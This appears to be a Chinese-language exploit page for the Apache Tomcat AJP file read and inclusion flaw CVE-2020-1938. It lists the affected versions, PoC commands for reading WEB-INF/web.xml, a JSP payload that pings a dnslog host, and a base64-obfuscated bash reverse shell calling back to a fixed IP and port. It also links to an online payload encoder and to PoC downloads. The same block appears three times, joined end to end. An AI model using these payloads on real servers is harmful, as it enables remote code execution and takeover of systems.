# Tomcat文件包含及讀取漏洞(CVE-2020-1938)
==漏洞影響==
Apache Tomcat 9.x < 9.0.31
Apache Tomcat 8.x < 8.5.51
Apache Tomcat 7.x < 7.0.100
Apache Tomcat 6.x
==前提條件==
目標機器開啟AJP Connector 服務端口(默認開啟,為8009端口)。
==文件讀取&文件包含RCE==
文件讀取:
python2 "Tomcat-ROOT路径下文件读取(CVE-2020-1938).py" -p 8009 -f /WEB-INF/web.xml 127.0.0.1
文件包含:
python2 "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /test.txt 127.0.0.1
test.txt:
<%
java.io.InputStream in = Runtime.getRuntime().exec("ping fiohed.dnslog.cn").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("
");
%>
==Getshell==
shell.txt:
<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC41LzE4ODg4IDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("
");
%>
==其他==
*反彈shell用的命令需要進行bash編碼
*在線bash編碼:http://www.jackson-t.ca/runtime-exec-payloads.html
*POC下載地址:https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read
==參考==
https://twitter.com/jas502n/status/1230531680999395328
https://forum.90sec.com/t/topic/801
https://www.svenbeast.com/post/fqSI9laE8/==漏洞影響==
Apache Tomcat 9.x < 9.0.31
Apache Tomcat 8.x < 8.5.51
Apache Tomcat 7.x < 7.0.100
Apache Tomcat 6.x
==前提條件==
目標機器開啟AJP Connector 服務端口(默認開啟,為8009端口)。
==文件讀取&文件包含RCE==
文件讀取:
python2 "Tomcat-ROOT路径下文件读取(CVE-2020-1938).py" -p 8009 -f /WEB-INF/web.xml 127.0.0.1
文件包含:
python2 "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /test.txt 127.0.0.1
test.txt:
<%
java.io.InputStream in = Runtime.getRuntime().exec("ping fiohed.dnslog.cn").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("");#去掉!
%>
==Getshell==
shell.txt:
<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC41LzE4ODg4IDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print(""); #去掉!
%>
==其他==
*反彈shell用的命令需要進行bash編碼
*在線bash編碼:http://www.jackson-t.ca/runtime-exec-payloads.html
*POC下載地址:https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read
==參考==
https://twitter.com/jas502n/status/1230531680999395328
https://forum.90sec.com/t/topic/801
https://www.svenbeast.com/post/fqSI9laE8/==漏洞影響==
Apache Tomcat 9.x < 9.0.31
Apache Tomcat 8.x < 8.5.51
Apache Tomcat 7.x < 7.0.100
Apache Tomcat 6.x
==前提條件==
目標機器開啟AJP Connector 服務端口(默認開啟,為8009端口)。
==文件讀取&文件包含RCE==
文件讀取:
python2 "Tomcat-ROOT路径下文件读取(CVE-2020-1938).py" -p 8009 -f /WEB-INF/web.xml 127.0.0.1
文件包含:
python2 "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /test.txt 127.0.0.1
test.txt:
<%
java.io.InputStream in = Runtime.getRuntime().exec("ping fiohed.dnslog.cn").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("");#去掉!
%>
==Getshell==
shell.txt:
<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC41LzE4ODg4IDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print(""); #去掉!
%>
==其他==
*反彈shell用的命令需要進行bash編碼
*在線bash編碼:http://www.jackson-t.ca/runtime-exec-payloads.html
*POC下載地址:https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read
==參考==
https://twitter.com/jas502n/status/1230531680999395328
https://forum.90sec.com/t/topic/801
https://www.svenbeast.com/post/fqSI9laE8/
请登录后查看评论内容